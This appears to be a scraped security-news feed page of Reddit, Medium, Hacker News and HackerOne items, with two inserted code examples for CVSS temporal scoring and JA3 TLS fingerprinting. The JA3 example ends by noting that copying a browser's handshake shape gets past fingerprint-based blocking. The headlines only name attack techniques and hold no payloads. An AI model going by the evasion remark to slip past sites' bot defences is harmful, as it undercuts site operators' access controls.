    Security for Personal IT Tutor
    Hi, I’m getting increasing requests from friends of friends of family to do some basic IT support work for them. With close family members I have been entrusted with access to their password managers and unattended remote access, which is really useful to be able to help with things they can’t do themselves or when they’re away from their devices - all the credentials for this are kept in a totally separate password manager from my personal accounts. However I recognise that this is big security risk, and if I’m going to be working with people outside my family, I want to avoid exposing them to unnecessary risk without severely limiting my ability to help them. What should I be conscious of in setting up a remote access solution for this purpose? Are there any good ways that clients can share passwords or access to specific accounts without me having access to their entire password manager? submitted by /u/marquitanavin [link] [comments]  ( 1 min )
    Temporal Scoring - CVSS How to Input
    So right now I am using CVSS v3.0 base scoring to calculate severity of a findings from scanning tools like Tenable.sc, snyk, and some other tools. I want to go farther and factor the CVSS Temporal score into the severity so I can prioritize better... question is how do I do that when I have 1,000+ findings and can't do it manually? Where can I get a feed or service or point in time data to get that? NVD does not provide it. ​ Thank you! submitted by /u/ThrowThrowAway789 [link] [comments]  ( 1 min )
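    The temporal score itself is plain arithmetic over the base score: Temporal = Roundup(Base × E × RL × RC), using the weights from the CVSS v3.x specification. The following added example (not from the post or from any vendor tool) does that calculation for a batch of findings and ranks them. The findings, IDs and vectors are constructed; the E/RL/RC values are assumed to arrive appended to the vector from the scanner or an exploit-intelligence feed, since, as the post notes, NVD publishes base metrics only.

```python
"""CVSS v3.1 temporal score: base score adjusted by E, RL and RC metrics."""
import math

# Temporal metric weights from the CVSS v3.1 specification (v3.0 uses the same values).
EXPLOIT_CODE_MATURITY = {"X": 1.0, "H": 1.0, "F": 0.97, "P": 0.94, "U": 0.91}
REMEDIATION_LEVEL = {"X": 1.0, "U": 1.0, "W": 0.97, "T": 0.96, "O": 0.95}
REPORT_CONFIDENCE = {"X": 1.0, "C": 1.0, "R": 0.96, "U": 0.92}


def roundup(value):
    """CVSS v3.1 Roundup: smallest one-decimal number >= value, done in
    integer arithmetic so that 4.000000001 does not become 4.1."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def temporal_score(base_score, e="X", rl="X", rc="X"):
    """Temporal = Roundup(Base * E * RL * RC); a base of 0 stays 0."""
    if base_score == 0:
        return 0.0
    return roundup(base_score * EXPLOIT_CODE_MATURITY[e] * REMEDIATION_LEVEL[rl] * REPORT_CONFIDENCE[rc])


def temporal_metrics(vector):
    """Extract E/RL/RC from a CVSS v3 vector string; absent metrics are X (Not Defined)."""
    metrics = {"E": "X", "RL": "X", "RC": "X"}
    for part in vector.split("/"):
        key, _, val = part.partition(":")
        if key in metrics:
            metrics[key] = val
    return metrics


def score_from_vector(base_score, vector):
    m = temporal_metrics(vector)
    return temporal_score(base_score, m["E"], m["RL"], m["RC"])


def severity(score):
    """Qualitative rating from the CVSS v3.x severity scale."""
    if score == 0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


# Constructed findings: (id, base score, vector). The E/RL/RC values are an
# assumption for the example: they would come from the scanner or an
# exploit-intelligence feed, since NVD publishes base metrics only.
FINDINGS = [
    ("finding-1", 9.8, "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"),
    ("finding-2", 9.8, "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:R"),
    ("finding-3", 7.5, "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"),
]


def prioritise(findings):
    """Rank findings by temporal score, highest first: two identical base
    scores separate once exploit maturity and patch availability are known."""
    scored = [(fid, base, score_from_vector(base, vec)) for fid, base, vec in findings]
    return sorted(scored, key=lambda f: f[2], reverse=True)


if __name__ == "__main__":
    for fid, base, temporal in prioritise(FINDINGS):
        print(f"{fid}: base {base} -> temporal {temporal} ({severity(temporal)})")
```

    The two 9.8 findings end up at 8.8 and 8.2 because a proof-of-concept exploit with an official fix outranks an unproven one reported with only reasonable confidence; that separation is the whole point of feeding temporal metrics into triage, and the hard part remains sourcing E/RL/RC at scale rather than the arithmetic.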
  • Open

    A new shellcode injection methodology
    submitted by /u/Idov31 [link] [comments]
    Binary-only fuzzing with python, Qemu and LibAFL
    submitted by /u/domenukk [link] [comments]
    Doing a uni project on pen testing and appreciated this article for help writing up an information disclosure vulnerability. Though some of you might appreciate it too.
    submitted by /u/PlatonicDogLover93 [link] [comments]  ( 1 min )
    Backdoor Found in Themes and Plugins from AccessPress Themes (CVE-2021-24867)
    submitted by /u/ScottContini [link] [comments]
  • Open

    The Threat Landscape and Attribution
    Over the years, changes in the threat landscape have made attribution more difficult. Attribution has always been challenging, but has been and can continue to be eased through visibility. That is, if your view into an event or campaign is limited to resources such as malware samples pulled from public repositories, then attribution can be challenging. Even adding information regarding infrastructure extracted from the sample configs can still give a somewhat limited view. However, as visibility is expanded to include data from intrusions and incidents, attribution becomes clearer and more granular. I ran across A Complex Threat Landscape Muddles Attribution recently and found it to be a fascinating, insightful read, one that anyone involved in threat intelligence, even peripherally, shoul…  ( 8 min )
  • Open

    Wildfire videos - wireless research UCSD
    The High Performance Wireless Research and Education Network (HPWREN), a University of California San Diego partnership project led by the San Diego Supercomputer Center and the Scripps Institution of Oceanography's Institute of Geophysics and Planetary Physics, supports Internet-data applications in the research, education, and public safety realms. HPWREN functions as a collaborative, Internet-connected cyberinfrastructure. The project supports a high-bandwidth wireless backbone and access data network in San Diego, Riverside, and Imperial counties in areas that are typically not well-served by other technologies to reach the Internet. This includes backbone locations, typically sited on mountain tops, to connect often hard-to-reach areas in the remote Southern California back country. http://hpwren.ucsd.edu/HWB/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Indiana Department of Homeland Security Fire Regulation Variance Requests
    submitted by /u/Typographical_Terror [link] [comments]  ( 1 min )
    Books on Theorists of Education [PT-BR]
    submitted by /u/afmachado [link] [comments]
  • Open

    Tracing Tor router connections within a host
    Hi there, I'm analysing a memory dump from an infected system that is running a cryptominer and connecting to the mining server through a Tor router. I know the processes of the miner and the tor router it installed on the system. Is there a way to show the miner handing over the IP of the actual mining server to the Tor router? The firewall of course just sees the connection to the next Tor router. submitted by /u/NazgulNr5 [link] [comments]  ( 1 min )
    What are some jobs that you can do with experience in computer forensics?
    I have a very close friend who has been doing computer forensics for well over 10 years and has experience with networking technology too. They've been working for local law enforcement all this time and has had to deal with "very bad sexual content" for quite a long time and it's really starting to eat away at their mental health. They really would like a job change. They are willing to work in law enforcement as long as the work doesn't involve kids. They make good money at the police department they work at now so a part of the equation is a paycheck. They are hoping to work at this job for the rest of their career. Teaching would also be an option. Thanks for any answers. submitted by /u/Onece_in_a_life_time [link] [comments]  ( 3 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    My Pentest Log -4-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Creating easy proof-of-concept scripts with Python and Curl.
    Hello Hunters! Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - XSS (CROSS SITE SCRIPTING) LAB SOLUTIONS
    Cross Site Scripting (XSS) is an attack in which, as a result of malicious commands the attacker runs in a web application,… Continue reading on Medium »  ( 32 min )
    Fuzzing is always fun..!!
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    Setting up a Free VPS for Bug Bounty & More
    Finding Bugs can be Time consuming and as for day-to-day life, you are not sitting on your one computer all day unless you are a… Continue reading on Medium »  ( 3 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability just from reconnaissance. Found multiple vulnerabilities on a web application that used the Symfony web… Continue reading on Medium »  ( 2 min )
  • Open

    Show HN: TypeScript Scenario-Based Web Application Fuzzing Framework
    Article URL: https://github.com/shfz/shfz Comments URL: https://news.ycombinator.com/item?id=30047196 Points: 1 # Comments: 0  ( 4 min )
  • Open

    SecWiki News 2022-01-23 Review
    No news has been posted today. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Is your home Wi-Fi secure?
    Is your home Wi-Fi secure? Could someone piggyback on your network, or could an attacker log in and steal your data?  ( 1 min )
    A condensed guide to common operations inside a domain
    Once we have penetrated the internal network, we need to quickly work out what environment we are in and decide how to act next. This article gives a very condensed introduction to these operations.  ( 1 min )
  • Open

    Intigriti’s January XSS challenge By TheRealBrenu
    First challenge for 2022 is here by TheRealBrenu. This one is a good example of javascript source maps, which I was unfamiliar at first… Continue reading on Medium »  ( 3 min )
  • Open

    OSINT Double Trouble
    It’s a new year, and that means new OSINT Challenges to solve. This time around, I’ll be solving 2 challenges courtesy of Twitter’s… Continue reading on Medium »  ( 4 min )
  • Open

    Cracking Kubernetes Network Policy
    TL; DR This post digs into the Kubernetes NetworkPolicy model, then designs a policy enforcer based on the technical requirements and further implements it with less than 100 lines of eBPF code. Hope that after reading through this post, readers will get a deeper understanding on how network policies are enforced in the underlying. Code and scripts in this post: here. TL; DR 1 Introduction 1.1 Access control (NetworkPolicy) in Kubernetes 1.2 How policies could be enforced in the underlying? 1.3 Purpose of this post 2 Design a dataplane policy enforcer 2.1 Introducing service identity 2.2 Introducing identity store: Labels Identity 2.3 Introducing policy cache 2.4 Introducing IPCache: PodIP -> Identity 2.5 Hooking and parsing traffic 2.6 Compose up: an end-to-end workflow 3 Imp…

  • Open

    I'm working in security and stuck on whether I should learn Web Development
    Hi Everyone, I currently work in Cyber security (Cryptography specialist) for a large organization. However, I have minimal coding experience. I would like to start the Odin Project but I'm not sure if I should invest all that time in learning web dev or continuing a path in security with something like a CISSP for more security knowledge. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know it might halt my security knowledge progression and I know I can't balance learning both right now. Will having both skills be better than just having one? If anyone has another suggestion that would be better I am open to that as well. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know I have a lot to learn in either path I choose. Thank you in advance. submitted by /u/Early_Ad_1861 [link] [comments]  ( 3 min )
    Backdoor payloads in image files: is this a thing?
    If I open an image in gmail (I think it opens through their viewer), can the payload run? Should I be concerned? Is just viewing it sufficient or would I have to download it? submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    Does anyone know what these photos/files are from the Brave browser folder?
    There were also some manifest.json's that had information like ""name":"Brave NTP sponsored images"", "Brave NTP sponsored images", "Tezos", "Taxbit" in them. Are these preloaded files for ads for a cryptocurrency/NFT manager that's placed somewhere in Brave intentionally? They were listed in a folder that looked like gibberish: "ghjifhoinncdowgrhioybqpasjndavbaoba" as an example. https://imgur.com/a/zozye1B I don't have to worry about some kind of "secret" cryptominer like Norton recently added to their software right? (I hope that this is the case and it's just files for ads). submitted by /u/nekohideyoshi [link] [comments]  ( 1 min )
    ISO 27001 Lead Auditor Certification
    Hey everyone. So I’m planning on doing the ISO 27001 LA certificate and came across it being offered by multiple certification body such as TUV, BSI and PECB. Can anyone tell me what the difference is between the certification bodies as I see a drastic price difference. Thanks in advance. submitted by /u/reeds1164 [link] [comments]  ( 1 min )
    What is the best entry level Linux certification?
    Hey everyone! Thank you for stopping by my post. I was wondering what is the best entry level Linux certification. I understand that the Linux+ and LPIC-1 are no longer a 1 for 2 package. Then everything I read online says don't go for either of these and look into getting a Red Hat certification. I am going down the security engineer road and just need to get much deeper into Linux than I currently am. What are your recommendations and thoughts on Linux certifications? submitted by /u/RedNeckHutch [link] [comments]  ( 3 min )
    What can work computers/IT have access to?
    Assume you have a work laptop given to you with a remote software that’s installed to give IT monitoring and troubleshooting access. What are some best practices for separating your work and personal stuff when using the work laptop? Should you avoid logging into things like your personal google account, Bank accounts, etc? Does this make it possible for someone in IT possibly with bad intent to also have access to your other devices in your network? If so, best practices to avoid such breaches? I assume you never want to login into your other computers shared drives from your work computer which will give access to every file on your personal computer that’s shared. I’m curious what is the extent of monitoring that a normal corporate workplace does on the computer? I always assumed they can see my screen at any time, all key strokes are logged. But this makes me uncomfortable in the event that there’s a breach, hack, or bad employee who can cause lots of damage. Thoughts on this matter? Anyone familiar with kaseya software for monitoring? submitted by /u/RasAlTimmeh [link] [comments]  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 2
    Previous: Beginner Bug Bounty Guide - Part 1 Continue reading on Medium »  ( 1 min )
    Bug Fix Update: TribeOne dApp is Ready to Take NFT Space by Storm
    Our dApp is getting closer and closer to perfection as we work hard to achieve the best possible user experience. Continue reading on Medium »  ( 2 min )
    Kenobi Walkthrough | TryHackMe | Explained | Part 1
    Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpd Continue reading on Medium »  ( 3 min )
    Malicious file upload leads to off-domain XSS
    Hello Everyone, Continue reading on Medium »  ( 1 min )
    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the… Continue reading on InfoSec Write-ups »  ( 6 min )
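    A site that rejects Burp's requests but accepts the browser's is usually fingerprinting the TLS ClientHello: JA3 concatenates the client's TLS version, cipher suites, extension types, supported groups and point formats (GREASE values excluded) and hashes the result with MD5, so Java's TLS stack behind Burp hashes differently from Chrome or Firefox. The following added example, not code from the Medium article, builds a ClientHello from a constructed specification (not a real capture) and then parses it back to produce the JA3 string and hash; the hostname, cipher list and extensions are assumptions chosen for the example.

```python
"""Compute the JA3 fingerprint of a TLS ClientHello from raw record bytes."""
import hashlib
import struct

# GREASE values (RFC 8701) are skipped by JA3 so that a client's randomised
# GREASE entries do not change its fingerprint.
GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}


def build_client_hello(version, ciphers, extensions):
    """Serialise a minimal TLS record carrying a ClientHello.

    `extensions` is a list of (type, data) pairs. Used here only to construct
    sample input; the bytes are not from a real capture."""
    body = struct.pack("!H", version)
    body += b"\x11" * 32                       # client random (fixed for the example)
    body += b"\x00"                            # empty session id
    cs = b"".join(struct.pack("!H", c) for c in ciphers)
    body += struct.pack("!H", len(cs)) + cs
    body += b"\x01\x00"                        # one compression method: null
    ext = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext)) + ext
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def _u16_list(data):
    """Parse a uint16 list with a 2-byte length prefix (ciphers, groups)."""
    n = struct.unpack("!H", data[:2])[0]
    return [struct.unpack("!H", data[2 + i:4 + i])[0] for i in range(0, n, 2)]


def ja3_string(record):
    """Return 'Version,Ciphers,Extensions,Curves,PointFormats' for a ClientHello."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    p = 9                                          # 5-byte record + 4-byte handshake header
    version = struct.unpack("!H", record[p:p + 2])[0]
    p += 2 + 32                                    # version, random
    p += 1 + record[p]                             # session id
    ciphers = [c for c in _u16_list(record[p:]) if c not in GREASE]
    p += 2 + struct.unpack("!H", record[p:p + 2])[0]
    p += 1 + record[p]                             # compression methods
    end = p + 2 + struct.unpack("!H", record[p:p + 2])[0]
    p += 2
    ext_types, curves, formats = [], [], []
    while p < end:
        t, length = struct.unpack("!HH", record[p:p + 4])
        data = record[p + 4:p + 4 + length]
        p += 4 + length
        if t in GREASE:
            continue
        ext_types.append(t)
        if t == 10:                                # supported_groups
            curves = [g for g in _u16_list(data) if g not in GREASE]
        elif t == 11:                              # ec_point_formats (1-byte length)
            formats = list(data[1:1 + data[0]])
    lists = (ciphers, ext_types, curves, formats)
    return ",".join([str(version)] + ["-".join(map(str, x)) for x in lists])


def ja3_hash(record):
    """JA3 is the MD5 of the JA3 string, printed as 32 hex characters."""
    return hashlib.md5(ja3_string(record).encode()).hexdigest()


# Constructed sample: TLS 1.2 hello with GREASE in the cipher list, the
# extension list and the supported groups, as a browser would send.
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x1a1a, 0x1301, 0x1302, 0xc02b, 0xc02f],
    [
        (0x2a2a, b""),                                  # GREASE extension
        (0, b"\x00\x0e\x00\x00\x0bexample.com"),        # server_name
        (10, b"\x00\x06\x1a\x1a\x00\x1d\x00\x17"),       # groups: GREASE, x25519, secp256r1
        (11, b"\x01\x00"),                              # point formats: uncompressed
        (43, b"\x04\x03\x04\x03\x03"),                  # supported_versions: 1.3, 1.2
        (13, b"\x00\x04\x04\x03\x08\x04"),              # signature_algorithms
    ],
)

if __name__ == "__main__":
    print(ja3_string(SAMPLE_HELLO))
    print(ja3_hash(SAMPLE_HELLO))
```

    Because the cipher and extension order is part of the string, the same host with a different TLS library, or the same library with a changed cipher ordering, produces a different hash; that is what the blocking rule keys on, and it is also why JA3 is a weak identity signal on its own: anything that can replay a browser's ClientHello shape gets the browser's hash.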
  • Open

    GoWard - A robust Red Team proxy written in Go
    submitted by /u/UnwearableCactus [link] [comments]
    CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Case in modern communist destabilization of Ukrainian-Poland relations
    Case provides overview of 5 year long activity of former Ukrainian citizen in Poland, conducting provocations and communist propaganda in… Continue reading on Medium »  ( 13 min )
    Quiztime — Random OSINT Challenge 5
    On Jan 14, 2022, Quiztime (contributor @dondude) shared a new OSINT quiz with us. The objective was fairly simple. We had to figure out… Continue reading on Medium »  ( 3 min )
    OSINT Challenge — On the road to Estonia
    In December 2021 the OSINT Dojo invited the community to solve a traditional image-based geolocation OSINT challenge. They have asked for… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-22 Review
    No news has been posted today. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Buffer Overflow in optimized_escape_html method
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1455248 - Bounty: $1200
    xss reflected on imgur.com
    Imgur disclosed a bug submitted by whoami991: https://hackerone.com/reports/1058427 - Bounty: $100
  • Open

    Android Pentesting-Intents
    When doing a black box pentesting for android , apart for looking at root detection bypass and ssl pinning looking for intents are also… Continue reading on Medium »  ( 2 min )
  • Open

    A collection of 8mm family videos from the 60's that have been digitized and restored
    submitted by /u/HGMIV926 [link] [comments]  ( 3 min )
  • Open

    OSS authors:“We need to understand your mitigation plans for this vulnerability”
    Article URL: https://twitter.com/bagder/status/1484672924036616195 Comments URL: https://news.ycombinator.com/item?id=30035651 Points: 68 # Comments: 11  ( 1 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    CVE-2021-45467: CWP CentOS Web Panel – Preauth RCE
    Article URL: https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/ Comments URL: https://news.ycombinator.com/item?id=30035247 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Employee Access to Data
    This is largely for those who work in, have worked in, or have worked with a SOC. For this example, there is a SOC that has tiers of analysts, with lower level analysts performing basic tasks and escalating alerts to the upper level analysts. The lower level analysts serve more of a traffic cop type of role; they weed out the easily spotted false-positives and may start very basic reviews of true positive events before handing off to the higher level analysts for analysis. In this setup, all members of the SOC have full access to M365 (all mailboxes, all OneDrives). This is in addition to the ability to triage machines via an EDR tool and collect files through that tool. My question: is that type of access appropriate for the lower level analysts? The obvious concern is that it is excessive data for the role they are performing, especially since the position has fairly high turnover. What are your thoughts? submitted by /u/ebarboza311 [link] [comments]  ( 2 min )
    digital forensics software bypass encryption
    How does forensics software extract files from password protected iPhones? submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Old iphone se
    I have an old iPhone SE I think. Somebody tried logging in a bunch of times and locked it out forever basically. So I connected to iTunes and it told me to update it so I did just in case it gives me a chance to try again and now it says phone unavailable. And not lock screen. So am I screwed, because it's extremely important to get the videos and photos from there. submitted by /u/TushieandTush [link] [comments]  ( 1 min )

  • Open

    CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
    submitted by /u/MiguelHzBz [link] [comments]
    The best free, open-source supply-chain security tool? The lockfile
    submitted by /u/pabloest [link] [comments]  ( 1 min )
    Captain Hook - How (not) to look for vulnerabilities in Java applications
    submitted by /u/Gallus [link] [comments]
  • Open

    I need advice
    Hi, I can choose among 3 internships as a computer science student. I really want to land a job in cybersecurity but right now I need to build up my CV and finish my degree. The 3 internships are: Automation Software Engineer (you have to validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, help evolving our telecommunication focused product, build demonstrations of product use cases help to prepare collaterals to explain technical product capabilities, software architectures and features, build automated test scripts to analyse test data to verify requirements compliance) Internship Program for Information Science or Telco Engineer (you have to participate to a project delivery for assigned tasks, that may include performing analysis and design of a IT or Telco Solution, SW Development, systems configurations, troubleshooting systems errors/problems, monitoring and/or testing systems performance, and contribute to the design of technical solutions for customer environments, work under supervision of technical lead and with customer nominated representatives to accomplish assigned tasks) Automated Assurance Artificial Intelligence & Machine Learning Engineer (validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, develop and extend the coverage of current test automation, build automated test scripts to analyse test data to verify requirements compliance, work on small independent software and system integration projects to augment internal work). As you can see they are intertwined, but I would guess the 2nd one could be more cybersec-oriented (for the telco part). What do you think? Any advice is appreciated. submitted by /u/Danyderossi [link] [comments]  ( 2 min )
    Switching From IT Audit
    Hello, I work in IT audit and I would like to have a more operational/hands-on role within an IT department. The problem is that I don't have any experience dealing directly with IT work. How would you recommend I go about transitioning from IT audit to a more technical role? Any certifications or skillsets you would recommend I obtain? I was thinking IT Security would probably be the best fit, given most of my audits are involved with IT security, patch management, or mobile device security. submitted by /u/DapperDandy22 [link] [comments]  ( 1 min )
    Payloads in Word/PDF documents: Is this still a thing?
    I read about this being used to hack computers recently. Are most computers still vulnerable to this? Payload=malicious file that could potentially create a backdoor that runs in the document when you enable macros (most people are not cognizant of this possibility). An article I read tested this successfully on a Windows machine running Outlook that defaulted to Adobe to read the PDF. I noticed in GMail that docs and PDFs aren't opened on the computer, but read in a window. Does this prevent payload execution? Anyways, I'd like to know if this is still a thing and why? Why can't Adobe or Microsoft build their applications to not allow this? submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    Red team Operator to security strategy consultant
    Hi all, I am currently working for a big four firm (US) as a red team member. I am thinking to switch to the broader sense of security to see more parts such as security strategy/security officer/architect roles. Many people see red teaming as the most fun job & I agree it is awesome. However, red team is only a small part of the equation. Who has made the leap and switched to a strategy role as a pentester/red teamer? What was your experience in the new role? submitted by /u/TechnicalCiso [link] [comments]  ( 2 min )
    Taking on new role as Security Architect. Advice? Tips? Considerations? Anything welcome!
    As the title states, taking on a new role as a Security Architect for a predominantly Windows hybrid cloud/on-prem environment that hosts quite a few web servers. I am very comfortable with the deployment and configuration of hardened endpoints, SIEMs (Splunk & ELK), network segregation, backup and restoration, and authoring most relevant policy and procedure as it relates to NIST 800-53. My understanding is that I am one of 2 "cybersecurity" specialists and will be responsible for documenting, developing, and configuring the entire security architecture from the ground up. I've been told that MFA has been enforced at 100% compliance. I am not however familiar with securing a hybrid environment, and don't have a ton of experience managing firewalls. How should I approach the discovery/recon aspect of becoming familiar with a new network? After getting my bearings and a detailed depiction of the current architecture, I plan to first tackle the backup and restoration processes to ensure ransomware resistance. Then address any glaring weak points. Anything to help a brother out? submitted by /u/UnderZinfluence [link] [comments]  ( 4 min )
    Likelihood of embedding malicious code in music streaming services?
    To the Red Teamers: imagine this. I use a music streaming service; I have some playlists that my friends and I collaborate on, and these playlists have "automatic download" enabled, so whenever a track is added it is also automatically downloaded to my device. Now take this further: you embed malicious code in tracks and upload them to the music service, then my friend adds this track with malicious code to the playlist, and bam! I have the file on my systems. Now add the fact that when you open a playlist for collaboration, it opens this playlist for everyone to add tracks. Sure, hacking the major providers of this service is going to be hard, but the small band/label/producer that uploads the tracks to the service is a classic supply chain. And the bad actor can just browse around for open playlists and add these "bad" tracks, and now you have the file on the device. So to what degree is this a likely attack vector? Is it at all feasible? Because you have plenty of versions for different OSes with likely exploits available. I at least was quite surprised to find a playlist of mine with a lot of new music I didn't recognize from a user I had not shared my playlist with. I was sitting at work and thought, "this is most likely an overlooked tool to use". So should one be worried about these "auto sync/download" features? A bit like Dropbox, but here it is open to everyone/the world. At least I block the unsanctioned cloud storage services while permitting the web part at work, so when you download stuff via web it's scanned and checked by our EDR, whereas I worry about the apps with auto sync and all that. So should I block Spotify, Tidal, SoundCloud [insert service here] apps as well? submitted by /u/Uli-Kunkel [link] [comments]  ( 3 min )
    Startup Asking for SSN in a Google Form
    I worked for a small startup during the summer of 2021. There were several things that came up during the internship that made me feel the company was not one that I would stand behind, and they didn't know what they were doing. They paid me hourly, but they never set up an employment contract that they promised. They never collected my tax info. Suddenly, within the last two days they have sent me several messages asking me to fill out a Google Form so they can complete the 1099's. The form is just straight up all the most sensitive information: full legal name, address, email & phone, SSN. (1) I'm not sure how secure it would be to send an SSN over a Google form, so I haven't done it yet. (2) I know that the form will result in a Google sheet that has all of the employees' info, and I'm not sure if the company will keep that secure or delete it, but it weirds me out thinking that there might indefinitely be a Google form out there with my SSN and other personal info, and they'll forget about it when the company inevitably goes defunct. (3) I'm not sure what other secure method I can suggest to get them this information so they can send the 1099. submitted by /u/ImpressiveAirport4 [link] [comments]  ( 2 min )
    Anyone surprised about the lack of fundamental knowledge in network security? Not enough forward engineering knowledge it seems.
    There seems to be a surprising lack of fundamental knowledge in network security. Has anyone else felt the same? Here are some examples from working with different teams: Work heavily with Kibana servers, but lacked fundamental database knowledge. You would think someone managing a cluster would at least understand the basics of distributed systems. Heavily use SIEMs, but could not tell you what the concept of an operating system process is beyond "Yeah, it's a program that executes." A serious lack of web development knowledge. A lot of people entering the field claiming they are knowledgeable in network security, but can't forward engineer a basic CRUD app, and yet they'll claim they know how to reverse engineer it and secure it. Yeah, you're able to successfully complete a basic SQL injection hackthebox, but you could barely construct a SQL query yourself. You just blindly put in a SQL query and hope you get back an error saying the web application is vulnerable and then blindly put in another SQL query. submitted by /u/me_hungry_and_sad [link] [comments]  ( 4 min )

    Cyber Investigator OSINT CTF “Cyber Crime” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT and forensics challenges. Continue reading on Medium »  ( 4 min )
    First Blog…
    This is my first ever blog. Blogging is not something I ever thought i’d end up doing, but to obtain #OSINTDojo ranks & badges there are… Continue reading on Medium »  ( 6 min )
    Urgent! Poles threaten well-known journalist Igor Isaev!
    Well-known Zaporizhzhia journalist Igor Isaev is facing 3 years in prison in Poland. Who did this? Continue reading on Medium »  ( 10 min )
    Windows Shell — Discovery Stage
    Sometimes you don’t always need a Meterpreter shell. Depending on the intent, Netcat might be all you need. The benefit being that Windows… Continue reading on Medium »  ( 5 min )
    Using Open Source Intelligence (OSINT)
    Recently, Netflix’s ‘The Great Hack’ has sparked a lot of interest around data privacy. The documentary covers Cambridge Analytica and how… Continue reading on Medium »  ( 7 min )

    hosted.weblate.org display of unfiltered results
    Weblate disclosed a bug submitted by joshmcman08: https://hackerone.com/reports/1454552
    Email change or personal data change on the account.
    Stripe disclosed a bug submitted by dk82hg: https://hackerone.com/reports/1250037 - Bounty: $3000
    [https://app.recordedfuture.com] - Reflected XSS via username parameter
    Recorded Future disclosed a bug submitted by bombon: https://hackerone.com/reports/1201134 - Bounty: $300
    disclosing clients' secret keys https://stage-uapi.tochka.com:2000/
    QIWI disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1419205 - Bounty: $150

    Duplicating USB drives
    Good day all, I feel my question is on the border of Computer forensics, but I believe still pertinent. I do not come from a background in IT, and have been figuring this all out on my own in the past few years. I have acquired a set (x3) of USB drives to collect images and videos from clients' phones in an easier way. I have added the exact nomenclature of what I have below. I need this to be done in a forensically sound manner, and I am currently going through the steps to validate my theory that these collect data in a forensically sound manner. To be forensically sound any media should be "zeroed" or wiped prior to use. Herein lies my question. With these flash drives they obviously have some sort of proprietary software which makes them work. If I were to format these I would lose this proprietary software. What would be a way I could format these drives and then return them to "manufacturer settings"? I have looked into USB duplicators, not sure if this could be a forensically sound option. Also, they seem too expensive to acquire for my organization currently. USB in question: MFi Certified 128GB Photo-Stick for iPhone-USB-Flash-Drives External Storage Stick for USB C iPhone-Thumb-Drive Memory-Mobile-for-Android-Phones iPad-Flash-Drive Photo Transfer Stick submitted by /u/Unfair-Border8865 [link] [comments]  ( 3 min )
    Unexplained WAN traffic to private subnet ranges
